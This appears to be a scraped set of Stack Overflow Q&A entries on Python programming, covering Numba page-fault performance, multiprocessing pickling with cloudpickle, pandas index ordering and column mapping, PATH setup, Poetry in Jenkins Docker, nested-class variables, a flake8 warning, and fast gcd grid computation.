%timeit triangle_half_UR_LL(1000) 932 μs ± 4.04 μs per loop (mean ± std. dev. of 7 runs, 1,000 loops each) In [15]: %timeit triangle_half_UR_LL(1000) 935 μs ± 1.23 μs per loop (mean ± std. dev. of 7 runs, 1,000 loops each) We can see that creating temporary array do impact the performance of the function as expected. Compiling Numba function do allocate some memory (quite a lot AFAIK) and so it can produce a similar impact. When the function is fast, the DRAM throughput is 1 GiB/s (~30% are writes), while it is 6 GiB/s (50~60% are writes) when the function is significantly slower. Note that I have some processes running in background taking about ~0.1 GiB/s in average (pretty variable). When the function is fast, I can also see that 20~35% of the time is spent in the kernel which is not great (but strangely nearly no kernel time in the master thread). This is typically due to page-faults for such a code, but also possibly I/O operations due to the cache=True option (unlikely since it should only happens in the master thread), or context switches (I see some of them occurring though it does not seems a major issue) especially due to the parallel execution, or waiting time of worker threads (certainly due to some load imbalance). The later seems to be a significant issue but this seems normal to me for rather memory-bound codes like yours. When the function is slow, the fraction of time spent in the kernel is slightly bigger (20~40%) in workers and much bigger in the master thread (30~85%). Unfortunately, I cannot profile the Windows kernel (as opposed to Linux) so to track the page-fault-related function calls... The reported call-stack in the low-level profiler I used (VTune) does not seems to provide such an information. I can safely say that this is apparently nothing related to I/O operations since there is very few I/Os during the computation. Experimentally, the clear biggest difference is the kernel time spent in the main thread (in read on the scheduling plot): Fast execution: Slow execution: Thus, I think the kernel time spent in the main thread is likely the one increasing significantly the execution time. This means the portion of code not in the prange loop unless page faults can happen in it. 
The culprit is thus these lines: x_coords = np.full(total, 0, dtype=np.uint16) y_coords = np.full(total, 0, dtype=np.uint16) side = np.arange(size, dtype=np.uint16) Conclusion This confirms the theory explained before: when the execution is fast, nearly no page faults happens (since nearly no time is spent in the kernel on the master thread) and data seems to mostly fit in CPU caches; when the execution is slow a significant fraction of the time is spent in the kernel in the Numpy function doing only memory operations so the only source of kernel overhead is page fault. This is very likely because the libc allocator often release the memory back to the OS (possibly even after each function call when the array are not needed anymore) and requests it back later. Moreover, we can see an increase of the DRAM throughput as expected in this case. Fix / Workaround On Linux, you can easily use another more conservative allocator (e.g. TC-malloc) by tweaking the LD_PRELOAD variable. On Windows, this is apparently more complicated (this might works with TC-malloc)... An alternative solution is just to do page fault as much as possible in parallel so to reduce their overhead by creating Numpy array with np.empty or np.zeros. That being said, page faults tend to poorly scale on Windows (as opposed to Linux were it is often significantly better). The best solution is just to preallocate and pre-fault arrays at initialisation-time and avoid temporary arrays as much as possible in critical portions of your program (even in benchmarks for the sake of reproducibility), especially large temporary arrays. In HPC application, preallocation is very common (also to avoid out-of-memory issues after >10h of computations on >100 machines). In native programs caring about performance, like games, HPC applications (and even browsers) custom allocators are often to avoid such issues (and the overhead of allocations). Unfortunately, in Python and especially in Numpy, it is very common to create a lot of new objects and temporary arrays (and even often promoted) although this is pretty inefficient (and makes benchmark more complicated), and AFAIK we cannot easily write custom allocators for Numpy/CPython. It is sometimes difficult to preallocate/pre-fault arrays because we do not always know the size before some computations. It also often make the Python code more complex. The same thing is true with in-place Numpy operations (which can be used to avoid temporary arrays). | 3 | 8 |
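As a concrete illustration of the preallocation workaround recommended in the answer above, here is a minimal sketch (function and buffer names are made up for the example): the output buffers are created and touched once at start-up, and the jitted kernel only writes into them, so the hot path never allocates and never triggers page faults of its own.

import numpy as np
import numba as nb

@nb.njit(cache=True, parallel=True)
def fill_triangle(size, x_coords, y_coords):
    # writes into caller-provided buffers; no allocation inside the kernel
    for i in nb.prange(size):
        offset = i * size - (i - 1) * i // 2
        end = offset + size - i
        for k in range(offset, end):
            x_coords[k] = i
            y_coords[k] = i + (k - offset)

size = 1000
total = (size + 1) * size // 2
x_buf = np.full(total, 0, dtype=np.uint16)   # allocated and faulted once, up front
y_buf = np.full(total, 0, dtype=np.uint16)
fill_triangle(size, x_buf, y_buf)            # reuse the same buffers on every call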
79,569,325 | 2025-4-11 | https://stackoverflow.com/questions/79569325/cannot-pickle-local-function-when-sending-callable-filter-objects-via-multiproce | Problem Description I'm developing a FilterBroker class that manages callable filters for subscriber processes. The broker receives functions wrapped in a Filter object via a message queue. However, I'm encountering a pickling error when trying to send a locally defined function: AttributeError: Can't get local object 'task.<locals>.function' The error occurs because the function is defined inside another function (task()) and is therefore not picklable, but I need to support sending lambda and locally defined functions. Code Example Here's a minimal reproducible example showing the issue: from threading import Thread from multiprocessing import Queue, Manager, Process from dataclasses import dataclass from typing import Optional import logging import inspect @dataclass class Service: id: Optional[int] = None name: str = "" port: int = 0 class Filter: def __init__(self, filter_function: callable): self.filter_function: callable = filter_function self.subscribers: list[Service] = [] def __call__(self, *args, **kwds): return self.filter_function(*args, **kwds) class FilterBroker(Thread): def __init__(self, queue: Queue) -> None: super().__init__() self.queue = queue self.filters: dict[str, Filter] = {} def add_filter(self, name: str, filter: Filter): if len(inspect.signature(filter).parameters) != 2: raise TypeError("Invalid Filter: must have exactly two parameters") self.filters[name] = filter def run(self): class_name = self.__class__.__name__ logging.info(f"[{class_name}]: Process started") while True: try: task = self.queue.get() logging.debug(f"[{class_name}]: Task received: {task}") if task is None: break if not isinstance(task, tuple) or not callable(task[0]) or not isinstance(task[1], Queue): continue response_queue, method, *args = task response = method(self, *args) except Exception: response = None finally: response_queue.put_nowait(response) @staticmethod def ask(fb: 'FilterBroker', *task): response_queue = Manager().Queue() fb.queue.put((response_queue, *task)) print("I put in queue") result = response_queue.get() print("I got result") response_queue.close() return result manager = Manager() broker = FilterBroker(manager.Queue()) broker.start() def task(broker): def function(x): return x > 0 f = Filter(function) print(f(2)) FilterBroker.ask(broker, FilterBroker.add_filter, 'test', f) logging.debug(f"Filter added") process = Process(target=task, args=(broker,)) process.start() process.join() print("Process finished") Full Error Traceback Traceback (most recent call last): File "/usr/lib64/python3.13/multiprocessing/process.py", line 313, in _bootstrap self.run() ~~~~~~~~^^ File "/usr/lib64/python3.13/multiprocessing/process.py", line 108, in run self._target(*self._args, **self._kwargs) ~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/home/****/Scrivania/github/ctf_proxy/refactoring/test.py", line 22, in task fb.ask(broker, fb.add_filter, 'test', f) ~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/home//****/Scrivania/github/ctf_proxy/refactoring/proxy/multiprocess/FilterBroker.py", line 299, in ask fb.queue.put((response_queue, *task)) ~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^ File "<string>", line 2, in put File "/usr/lib64/python3.13/multiprocessing/managers.py", line 830, in _callmethod conn.send((self._id, methodname, args, kwds)) ~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File 
"/usr/lib64/python3.13/multiprocessing/connection.py", line 206, in send self._send_bytes(_ForkingPickler.dumps(obj)) ~~~~~~~~~~~~~~~~~~~~~^^^^^ File "/usr/lib64/python3.13/multiprocessing/reduction.py", line 51, in dumps cls(buf, protocol).dump(obj) ~~~~~~~~~~~~~~~~~~~~~~~^^^^^ AttributeError: Can't get local object 'task.<locals>.function' Question How can I modify my code to support sending locally defined functions and lambdas via multiprocessing? I want subscribers to be able to register and retrieve custom filter functions without having to define them at the module level. | you should use cloudpickle, you'll have to do the cloudpickle.dumps and cloudpickle.loads yourself. from threading import Thread from multiprocessing import Queue, Manager, Process from dataclasses import dataclass from typing import Optional import logging import inspect import cloudpickle @dataclass class Service: id: Optional[int] = None name: str = "" port: int = 0 class Filter: def __init__(self, filter_function: callable): self.filter_function: callable = filter_function self.subscribers: list[Service] = [] def __call__(self, *args, **kwds): return self.filter_function(*args, **kwds) class FilterBroker(Thread): def __init__(self, queue: Queue) -> None: super().__init__() self.queue = queue self.filters: dict[str, Filter] = {} def add_filter(self, name: str, filter: Filter): if len(inspect.signature(filter).parameters) != 2: raise TypeError("Invalid Filter: must have exactly two parameters") self.filters[name] = filter def run(self): class_name = self.__class__.__name__ logging.info(f"[{class_name}]: Process started") while True: try: task = self.queue.get() logging.debug(f"[{class_name}]: Task received: {task}") if task is None: break response_queue, pickled_task = task method, *args = cloudpickle.loads(pickled_task) response = method(self, *args) except Exception: import traceback traceback.print_exc() response = None finally: if task is not None: response_queue.put_nowait(response) class FilterBrokerAsker: def __init__(self, queue: Queue) -> None: super().__init__() self.queue = queue @staticmethod def ask(fb: 'FilterBrokerAsker', *task): pickled_task = cloudpickle.dumps(task) response_queue = Manager().Queue() fb.queue.put((response_queue, pickled_task)) print("I put in queue") result = response_queue.get() print("I got result") return result def task(broker): def function(x): print("running local function!") return x > 0 f = Filter(function) print(f(2)) FilterBrokerAsker.ask(broker, FilterBroker.add_filter, 'test', f) logging.debug(f"Filter added") if __name__ == "__main__": manager = Manager() broker = FilterBroker(manager.Queue()) broker.start() broker_data = FilterBrokerAsker(broker.queue) process = Process(target=task, args=(broker_data,)) process.start() process.join() print("Process finished") broker.queue.put(None) running local function! True I put in queue I got result Process finished the split to FilterBrokerAsker is to get it to work with spawn instead of fork, as threads are not picklable. note that cloudpickle has problems with imports, and you may need to re-import things inside your functions, the whole concept is very fragile, and FWIW you should just use threads instead. | 2 | 1 |
79,569,500 | 2025-4-11 | https://stackoverflow.com/questions/79569500/how-can-i-sort-order-of-index-based-on-my-preference-in-multi-index-pandas-dataf | I have a pandas dataframe df. It has multi-index with Gx.Region and Scenario_Model. The Scenario_Model index is ordered in alphabetical order des, pes, tes. When I plot it, it comes in the same order. However, I want to reorder it as pes, tes and des, and plot it accordingly. Is it possible to achieve it in Python pandas dataframe? dict = {('Value', 2023, 'BatteryStorage'): {('Central Africa', 'des'): 0.0, ('Central Africa', 'pes'): 0.0, ('Central Africa', 'tes'): 0.0, ('Eastern Africa', 'des'): 0.0, ('Eastern Africa', 'pes'): 0.0, ('Eastern Africa', 'tes'): 0.0, ('North Africa', 'des'): 0.0, ('North Africa', 'pes'): 0.0, ('North Africa', 'tes'): 0.0, ('Southern Africa', 'des'): 504.0, ('Southern Africa', 'pes'): 100.0, ('Southern Africa', 'tes'): 360.0, ('West Africa', 'des'): 0.0, ('West Africa', 'pes'): 0.0, ('West Africa', 'tes'): 0.0}, ('Value', 2023, 'Biomass PP'): {('Central Africa', 'des'): 0.0, ('Central Africa', 'pes'): 0.0, ('Central Africa', 'tes'): 0.0, ('Eastern Africa', 'des'): 40, ('Eastern Africa', 'pes'): 10, ('Eastern Africa', 'tes'): 50, ('North Africa', 'des'): 0.0, ('North Africa', 'pes'): 0.0, ('North Africa', 'tes'): 0.0, ('Southern Africa', 'des'): 90.0, ('Southern Africa', 'pes'): 43.0, ('Southern Africa', 'tes'): 50.0, ('West Africa', 'des'): 200.0, ('West Africa', 'pes'): 150.0, ('West Africa', 'tes'): 100}} df_sample = pd.DataFrame.from_dict(dict) df_sample.plot(kind = "bar", stacked = True) | A quick an easy approach, if you know the categories, would be to reindex: (df_sample.reindex(['pes', 'tes', 'des'], level=1) .plot(kind='bar', stacked=True) ) A more canonical (but more complex) approach would be to make the second level an ordered Categorical: order = pd.CategoricalDtype(['pes', 'tes', 'des'], ordered=True) (df_sample .set_axis(pd.MultiIndex.from_frame(df_sample.index.to_frame() .astype({1: order}), names=[None, None])) .sort_index() .plot(kind='bar', stacked=True) ) Output: | 3 | 2 |
79,569,039 | 2025-4-11 | https://stackoverflow.com/questions/79569039/python-is-installed-in-two-different-locations | I am trying to get the latest version of Python to run on my Linux Ubuntu 24.04 system, but the older version is still showing as current. There are two locations that Python is configured, '/usr/bin' and '/usr/local/bin'. How should I handle this to get the correct configuration on my system? I tried ~-> $ python --version and the response is Python 3.12.3 But, when I try ~-> $ python3 --version the response is Python 3.13.3 Python installation | Simply put one Python path in front of the other, for example if you want /usr/local/bin to be found before /usr/bin, then do this: export PATH=/usr/local/bin:${PATH} in your shell. If you are satisfied with the result, put the above line in your ~/.bashrc. | 1 | 1 |
79,568,585 | 2025-4-11 | https://stackoverflow.com/questions/79568585/running-poetry-in-using-jenkins-dockerfile | I've got my dockerfile FROM git.corp.com:4567/some/python:3.11-slim RUN apt update; \ apt install pipx -y; \ pipx install poetry; \ pipx ensurepath; \ chmod a +rx /root/.local/bin/poetry; \ ln -s /root/.local/bin/poetry /usr/bin/poetry; \ and my jenkins stage stage('Test') { agent { dockerfile{ filename 'Dockerfile.build' args "-v $WORKSPACE:/app" reuseNode true } } steps { sh """ ls -l poetry poetry install --no-root -E tests -E mypy -E lint PYTHONPATH="$PWD/src" pytest """ } } Why do I get this message? script.sh.copy: 3: poetry: Permission denied I've changed permessions using chmod a +rx ls -l poetry output looks like this lrwxrwxrwx 1 root root 23 Apr 11 10:02 /usr/bin/poetry -> /root/.local/bin/poetry I know Jenkins pass -u 1000:1000 arguments to docker run command but shouldn't chmod fix this? | Try to install Poetry to the path which will be available to all users instead of installing it to /root/.local ENV PIPX_HOME=/opt/pipx \ PIPX_BIN_DIR=/usr/local/bin RUN apt update && \ apt install pipx -y && \ pipx install poetry | 1 | 3 |
79,568,097 | 2025-4-11 | https://stackoverflow.com/questions/79568097/python-static-class-variable-in-nested-class | I have a nested class that uses static vars to have class wide parameters and accumulators. If I do it as a standalone class it works. If I do a nested class and inherit the standalone class, it works. But I can't get a nested class to have static class variables, the interpreter gets confused. What am I doing wrong? Code snippet: class Cl_static_parameter_standalone: #static var common to all instances. Two uses: common settings, common accumulator c_n_counter : int = 0 @staticmethod def increment() -> int: Cl_static_parameter_standalone.c_n_counter += 1 return Cl_static_parameter_standalone.c_n_counter class Cl_some_class: class Cl_static_parameter_inherited(Cl_static_parameter_standalone): pass class Cl_static_parameter_nested: c_n_counter : int = 0 @staticmethod def increment() -> int: Cl_static_parameter_nested.c_n_counter += 1 return Cl_static_parameter_nested.c_n_counter def __init__(self): return def do_something(self): print(f"Execute Standalone: {Cl_static_parameter_standalone.increment()}") print(f"Execute Inherited: {self.Cl_static_parameter_inherited.increment()}") print(f"Execute Nested: {self.Cl_static_parameter_nested.increment()}") return my_instance = Cl_some_class() my_instance.do_something() Output: Execute Standalone: 1 Execute Inherited: 2 Traceback (most recent call last): File "stack_overflow_class_static_parameter.py", line 52, in <module> my_instance.do_something() ~~~~~~~~~~~~~~~~~~~~~~~~^^ File "stack_overflow_class_static_parameter.py", line 48, in do_something print(f"Execute Nested:{self.Cl_static_parameter_nested.increment()}") ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^ File "stack_overflow_class_static_parameter.py", line 38, in increment Cl_static_parameter_nested.c_n_counter += 1 ^^^^^^^^^^^^^^^^^^^^^^^^^^ NameError: name 'Cl_static_parameter_nested' is not defined. Did you mean: 'Cl_static_parameter_standalone'? | You can use the classmethod decorator, which is more appropriate for this situation anyways: class C: class Nested: counter = 0 @classmethod def increment(cls) -> int: cls.counter += 1 return cls.counter print(C().Nested.increment()) # prints 1 If you are wondering why increment can't find Cl_static_parameter_nested in your example: you would have to write Cl_some_class.Cl_static_parameter_nested to access it from the global namespace. | 1 | 2 |
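To make the name-resolution point of the answer above concrete: once the outer class exists as a module-level name, the nested class can also be reached through it, so the original staticmethod style works if the reference is fully qualified. A minimal sketch with shortened names:

class Outer:
    class Nested:
        counter = 0

        @staticmethod
        def increment() -> int:
            # the enclosing class body is not a scope, so qualify via the outer class
            Outer.Nested.counter += 1
            return Outer.Nested.counter

print(Outer.Nested.increment())  # 1
print(Outer.Nested.increment())  # 2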
79,567,933 | 2025-4-11 | https://stackoverflow.com/questions/79567933/using-a-class-property-as-an-iterable-produces-a-reassign-warning | I need to use an iterable and a loop variable as a class property. But the flake8 checker produces B2020 warning: easy.py:11:13: B020 Found for loop that reassigns the iterable it is iterating with each iterable value. If I use a variable for iterable there is OK. What is wrong? The warning example: #!/usr/bin/env python3 """Example of B020 error.""" class My_Template: """My example.""" def __init__(self, *template): """Obviously init.""" self.all_templates = (1, 2, 3) for self.tpl in self.all_templates: print(self.tpl) The flake8 complains about loop variable: easy.py:11:13: B020 Found for loop that reassigns the iterable it is iterating with each iterable value. The OK example: #!/usr/bin/env python3 """Example of B020 error.""" class My_Template: """My example.""" def __init__(self, *template): """Obviously init.""" all_templates = (1, 2, 3) for self.tpl in all_templates: print(self.tpl) | It's a known issue: https://github.com/PyCQA/flake8-bugbear/issues/248 Understandably flake8-bugbear developers are a bit unwilling to fix this as it's not very common to use an instance attribute as the loop variable. It's also not really needed. You can simply use a normal loop variable: class My_Template: def __init__(self, *template): self.all_templates = (1, 2, 3) for tpl in self.all_templates: self.tpl = tpl print(self.tpl) | 1 | 1 |
79,564,589 | 2025-4-9 | https://stackoverflow.com/questions/79564589/how-to-find-all-grid-points-that-correspond-to-non-reduced-fractions-in-a-square | Given a positive integer N, we can label all grid points in the square N x N, starting at 1, the total number of grid points is N x N, and the grid points are list(itertools.product(range(1, N + 1), repeat=2)). Now, I want to find all tuples (x, y) that satisfies the condition x/y is a non-reduced fraction, the following is a bruteforce implementation that is guaranteed to be correct, but it is very inefficient: import math from itertools import product def find_complex_points(lim: int) -> list[tuple[int, int]]: return [ (x, y) for x, y in product(range(1, lim + 1), repeat=2) if math.gcd(x, y) > 1 ] Now the next function is slightly smarter, but it generates duplicates and as a result is only noticeably faster but not by much: def find_complex_points_1(lim: int) -> set[tuple[int, int]]: lim += 1 return { (x, y) for mult in range(2, lim) for x, y in product(range(mult, lim, mult), repeat=2) } In [255]: %timeit find_complex_points(1024) 233 ms ± 4.44 ms per loop (mean ± std. dev. of 7 runs, 1 loop each) In [256]: %timeit find_complex_points_1(1024) 194 ms ± 1.9 ms per loop (mean ± std. dev. of 7 runs, 10 loops each) Is there a better way to accomplish this? (My goal is simple, I want to create a NumPy 2D array of uint8 type with shape (N, N), fill it with 255, and make all pixels (x, y) 0 if (x+1)/(y+1) is a non-reduced fraction) I have devised a method that is smarter than both my previous ones by a wide margin, and also tremendously faster, but it still generates duplicates, I have opt to not to use a set here so that you can copy-paste the code as is and run some tests and see the exact output in the order they are generated: def find_complex_points_2(lim: int) -> set[tuple[int, int]]: stack = dict.fromkeys(range(lim, 1, -1)) lim += 1 points = [] while stack: x, _ = stack.popitem() points.append((x, x)) mults = [] for y in range(x * 2, lim, x): stack.pop(y, None) mults.append(y) points.extend([(x, y), (y, x)]) for i, x in enumerate(mults): points.append((x, x)) for y in mults[i + 1:]: points.extend([(x, y), (y, x)]) return points In [292]: sorted(set(find_complex_points_2(1024))) == find_complex_points(1024) Out[292]: True In [293]: %timeit find_complex_points_2(1024) 58.9 ms ± 580 μs per loop (mean ± std. dev. of 7 runs, 10 loops each) In [294]: %timeit find_complex_points(1024) 226 ms ± 3.24 ms per loop (mean ± std. dev. of 7 runs, 1 loop each) To clarify, the output of find_complex_points_2(10) is: In [287]: find_complex_points_2(10) Out[287]: [(2, 2), (2, 4), (4, 2), (2, 6), (6, 2), (2, 8), (8, 2), (2, 10), (10, 2), (4, 4), (4, 6), (6, 4), (4, 8), (8, 4), (4, 10), (10, 4), (6, 6), (6, 8), (8, 6), (6, 10), (10, 6), (8, 8), (8, 10), (10, 8), (10, 10), (3, 3), (3, 6), (6, 3), (3, 9), (9, 3), (6, 6), (6, 9), (9, 6), (9, 9), (5, 5), (5, 10), (10, 5), (10, 10), (7, 7)] As you can see, (10, 10) shows up twice. I want to avoid redundant computations. Also this happens in find_complex_points_1, if I don't use a set, then many duplicates will be included, because the method used will inevitably generate them repeatedly, by using a set there still is unnecessary computation, it just doesn't collect the duplicates. And no, I actually want the coordinates to be replaced by the sum of all numbers before it, so N is replaced by (N2 + N) / 2. 
I just implemented the image generation to better illustrate what I want: import numpy as np import numba as nb @nb.njit(cache=True) def resize_img(img: np.ndarray, h_scale: int, w_scale: int) -> np.ndarray: height, width = img.shape result = np.empty((height, h_scale, width, w_scale), np.uint8) result[...] = img[:, None, :, None] return result.reshape((height * h_scale, width * w_scale)) def find_composite_points(lim: int) -> set[tuple[int, int]]: stack = dict.fromkeys(range(lim, 1, -1)) lim += 1 points = set() while stack: x, _ = stack.popitem() points.add((x, x)) mults = [] for y in range(x * 2, lim, x): stack.pop(y, None) mults.append(y) points.update([(x, y), (y, x)]) for i, x in enumerate(mults): points.add((x, x)) for y in mults[i + 1 :]: points.update([(x, y), (y, x)]) return points def natural_sum(n: int) -> int: return (n + 1) * n // 2 def composite_image(lim: int, scale: int) -> np.ndarray: length = natural_sum(lim) img = np.full((length, length), 255, dtype=np.uint8) for x, y in find_composite_points(lim): x1, y1 = natural_sum(x - 1), natural_sum(y - 1) img[x1 : x1 + x, y1 : y1 + y] = 0 return resize_img(img, scale, scale) composite_image(12, 12) | The algorithm of Weeble runs in O(n² m²) where m is the size of integers in bits (using a naive multiplication). Since we can assume the multiplication of numbers to be done in constant time (due to bounded native integers used by Numpy), this means O(n²) but with a significant hidden constant which should not be neglected. Performance wise, the algorithm is bounded by inefficient page fault operations and the filling of big temporary arrays. It is far from being optimal. The algorithm of Pete Kirkham should run in O(n²) (hard to prove formally though) with a relatively small hidden constant. This is is a good approach. However, is is very slow because of inefficient scalar Numpy operations instead of vectorised ones. Fortunately, it can be easily vectorised: array = np.full((N,N), 255, np.uint8) for d in range(2, N+1): array[d-1:N:d, d-1:N:d] = 0 Note I corrected the implementation to return correct results (with values 0 and 255). A very simple alternative solution is just to use Numba so to speed up the code of Pete Kirkham. That being said, the code is not efficient because it iterates on items of different rows in the inner most loop. We can easily fix that by swapping variables: import numba as nb @nb.njit('(int32,)') def compute(N): array = np.full((N,N), 255, np.uint8) for denominator in range(2, N+1): for i in range(denominator, N+1, denominator): for j in range(denominator, N+1, denominator): array[i-1, j-1] = 0 return array Faster alternative approach Note that the output matrix is symmetric so we don't even need to compute the bottom-left part. Indeed, gcd(a, b) == gcd(b, a). Unfortunately, I do not think the can use this property to make the Numpy vectorised code but we can probably make the Numba code faster. Moreover, the diagonal can be trivially set to 0 (except the first item) since gcd(a, a) == a so gcd(a, a) > 1 if a > 1. Technically, we can also trivially set the direct neighbourhood of the diagonal (i.e. array.diagonal(1)) to 255 since gcd(a, a-1) = 1. array.diagonal(1) should be filled with alternating values (i.e. [255, 0, 255, 0, ...]) since gcd(a, a-2) = gcd(a, 2) = 2 - (a % 2). A similar strategy can be applied for array.diagonal(2). For other diagonal, it starts to be more complex since we certainly need to factorise numbers. 
Factorising numbers is known to be expensive, but this cost is amortised here since we need to do that O(n) times. Another symmetry of the gcd is gcd(a, b) = gcd(a, b-a) = gcd(a-b, b). We can leverage all these symmetry of the gcd so to write a significantly faster implementation using dynamic programming. A naive implementation (combining all the symmetries rather efficiently) is the following: @nb.njit('(int32,)') def compute_v2(n): arr = np.empty((n,n), np.uint8) arr[:, 0] = 255 arr[0, :] = 255 for i in range(1, n): for j in range(1, i): arr[i, j] = arr[j, i-j-1] # <--- very slow part arr[i, i] = 0 for j in range(i+1, n): arr[i, j] = arr[i, j-i-1] return arr Unfortunately the transposition is pretty inefficient and take nearly all the time... Optimizing is possible but not easy. We can divide the computation in dependent tiles (similar to how block LU decomposition algorithm work). This makes the code more complex much much faster thanks to a more efficient access pattern: # Compute the tile arr[start:stop,start:stop]. # Assume arr[:start,:start] has been already computed. # Assume start and stop are valid. @nb.njit('(uint8[:,::1], uint32, uint32)', inline='always') def compute_diag_tile(arr, start, stop): for i in range(start, stop): for j in range(start, i): arr[i, j] = arr[j, i-j-1] arr[i, i] = 0 for j in range(i+1, stop): arr[i, j] = arr[i, j-i-1] # Compute the tile arr[start:stop,stop:]. # Assume arr[start:stop,:stop] has been already computed. # Assume start and stop are valid. @nb.njit('(uint8[:,::1], uint32, uint32)', inline='always') def compute_upper_right_tile(arr, start, stop): n = np.uint32(arr.shape[1]) for i in range(start, stop): for j in range(stop, n): arr[i, j] = arr[i, np.uint64(j-i-1)] # Compute the tile arr[stop:,start:stop]. # Assume arr[start:stop,stop:] has been already computed; that is to say # compute_upper_right_tile has been called on the associated diag tile. # This function transposes the tile written by compute_upper_right_tile. # Assume start and stop are valid. @nb.njit('(uint8[:,::1], uint32, uint32)', inline='always') def compute_bottom_left_tile(arr, start, stop): n = np.uint32(arr.shape[0]) for i in range(stop, n): for j in range(start, stop): arr[i, j] = arr[j, i] @nb.njit('(uint8[:,::1], uint32, uint32)', inline='always') def compute_tile_group(arr, start, stop): compute_diag_tile(arr, start, stop) compute_upper_right_tile(arr, start, stop) compute_bottom_left_tile(arr, start, stop) @nb.njit('(uint32,)') def compute_v3(n): chunk_size = 32 arr = np.empty((n, n), np.uint8) arr[0, :] = 255 arr[:, 0] = 255 for start in range(1, n, chunk_size): if start + chunk_size <= n: compute_tile_group(arr, start, start + chunk_size) else: compute_tile_group(arr, start, n) return arr The transposition is still the slowest part of this code. It can be optimized further but at the expense of a significantly bigger code. I prefer to keep this reasonably simple, but note that one way to make the transposition much faster is to use SIMD intrinsics (certainly at least >2 faster). 
Benchmark Here are results for N=1024 on my machine (i5-9600KF CPU): find_complex_points: 173 ms PeteKirkham's code: 108 ms find_complex_points_1: 99 ms Weeble's code: 70 ms find_complex_points_2: 38 ms Vectorized Numpy code: 4.0 ms <----- PeteKirkham's code with Numba: 2.5 ms Numba code `compute_v2`: 0.70 ms Numba code `compute`: 0.66 ms Numba code `compute_v3`: 0.45 ms <----- find_complex_points_3: 0.44 ms The vectorised Numba code is much faster than the other implementation and the optimised Numba codes outperforms all implementation by a large margin (except the new find_complex_points_3)! One can parallelise some of the Numba codes to make it even faster but this is not trivial and it is certainly fast enough anyway, not to mention is will not scale well because the code is rather memory-bound for large N. Actually, a basic Numpy copy takes about 0.3 ms, which can be considered as a lower bound execution time. | 10 | 9 |
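For readers who want to convince themselves that the sieve-style vectorised fill in the answer above really is equivalent to the gcd definition, a small brute-force cross-check is easy to write (the size here is deliberately tiny):

import math
import numpy as np

def sieve_mask(N):
    arr = np.full((N, N), 255, np.uint8)
    for d in range(2, N + 1):
        arr[d-1:N:d, d-1:N:d] = 0      # mark pairs where d divides both coordinates
    return arr

def brute_mask(N):
    arr = np.full((N, N), 255, np.uint8)
    for x in range(1, N + 1):
        for y in range(1, N + 1):
            if math.gcd(x, y) > 1:
                arr[x-1, y-1] = 0
    return arr

N = 64
assert np.array_equal(sieve_mask(N), brute_mask(N))
print("sieve matches brute force for N =", N)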
79,567,429 | 2025-4-10 | https://stackoverflow.com/questions/79567429/duplicate-and-rename-columns-on-pandas-dataframe | I guess this must be rather simple, but I'm struggling to find the easy way of doing it. I have a pandas DataFrame with the columns A to D and need to copy some of the columns to new ones. The trick is that it not just involves renaming, I also need to duplicate the values to new columns as well. Here is an example of the input: import pandas as pd df = pd.DataFrame({ 'A': [1,2,3], 'B':['2025-10-01', '2025-10-02', '2025-10-01'], 'C': ['2025-02-10', '2025-02-15', '2025-02-20'], 'D': [0, 5, 4], 'values': [52.3, 60, 70.6] }) mapping_dict = { 'table_1': { 'id': 'A', 'dt_start': 'B', 'dt_end': 'B', }, 'table_2': { 'id': 'D', 'dt_start': 'C', 'dt_end': 'C', }, } I'd like to have as output for table_1 a DataFrame as follows: id dt_start dt_end values 1 2025-10-01 2025-10-01 52.3 2 2025-10-02 2025-10-02 60 3 2025-10-01 2025-10-01 80.6 And I guess it is possible to infer the expected output for table_2. Note that the column values, which is not included in the mapping logic, should remain in the dataframe. I was able to achieve this by using a for loop, but I feel that should be a natural way of doing this directly on pandas without manually looping over the mapping dict and then dropping the extra columns. Here is my solution so far: table_name = 'table_1' new_df = df.copy() for new_col, old_col in mapping_dict[table_name].items(): new_df[new_col] = df[old_col] new_df = new_df.drop(mapping_dict[table_name].values(), axis='columns') Any help or suggestion will be appreciated! | IIUC, you can do this with this command, this is one of the reason I like to use the set_axis method in dataframes. table_name = 'table_1' df[list(mapping_dict[table_name].values())+['values']].set_axis(list(mapping_dict[table_name].keys())+['values'], axis=1) Output: id dt_start dt_end values 0 1 2025-10-01 2025-10-01 52.3 1 2 2025-10-02 2025-10-02 60.0 2 3 2025-10-01 2025-10-01 70.6 Or, table_name = 'table_2' df[list(mapping_dict[table_name].values())+['values']].set_axis(list(mapping_dict[table_name].keys())+['values'], axis=1) Output: id dt_start dt_end values 0 0 2025-02-10 2025-02-10 52.3 1 5 2025-02-15 2025-02-15 60.0 2 4 2025-02-20 2025-02-20 70.6 And, much like @khushalvaland you can create function for resuse: def gen_table(df, mapping, cols) -> pd.DataFrame: return (df[list(mapping.values())+cols] .set_axis(list(mapping.keys())+cols, axis=1)) gen_table(df, mapping = mapping_dict['table_1'], cols =['values']) gen_table(df, mapping = mapping_dict['table_2'], cols =['values']) Output: id dt_start dt_end values 0 1 2025-10-01 2025-10-01 52.3 1 2 2025-10-02 2025-10-02 60.0 2 3 2025-10-01 2025-10-01 70.6 and id dt_start dt_end values 0 0 2025-02-10 2025-02-10 52.3 1 5 2025-02-15 2025-02-15 60.0 2 4 2025-02-20 2025-02-20 70.6 | 2 | 3 |
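An equivalent way to express the same idea as the accepted answer, kept as a small reusable helper (a sketch that assumes the df and mapping_dict from the question): build the new frame column-by-column from the mapping, then carry over any untouched columns.

import pandas as pd

def build_table(df: pd.DataFrame, mapping: dict, keep=('values',)) -> pd.DataFrame:
    # one new column per mapping entry; duplicated sources are simply copied twice
    out = pd.DataFrame({new: df[old] for new, old in mapping.items()})
    for col in keep:
        out[col] = df[col]
    return out

# build_table(df, mapping_dict['table_1'])  # same result shape as the set_axis version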
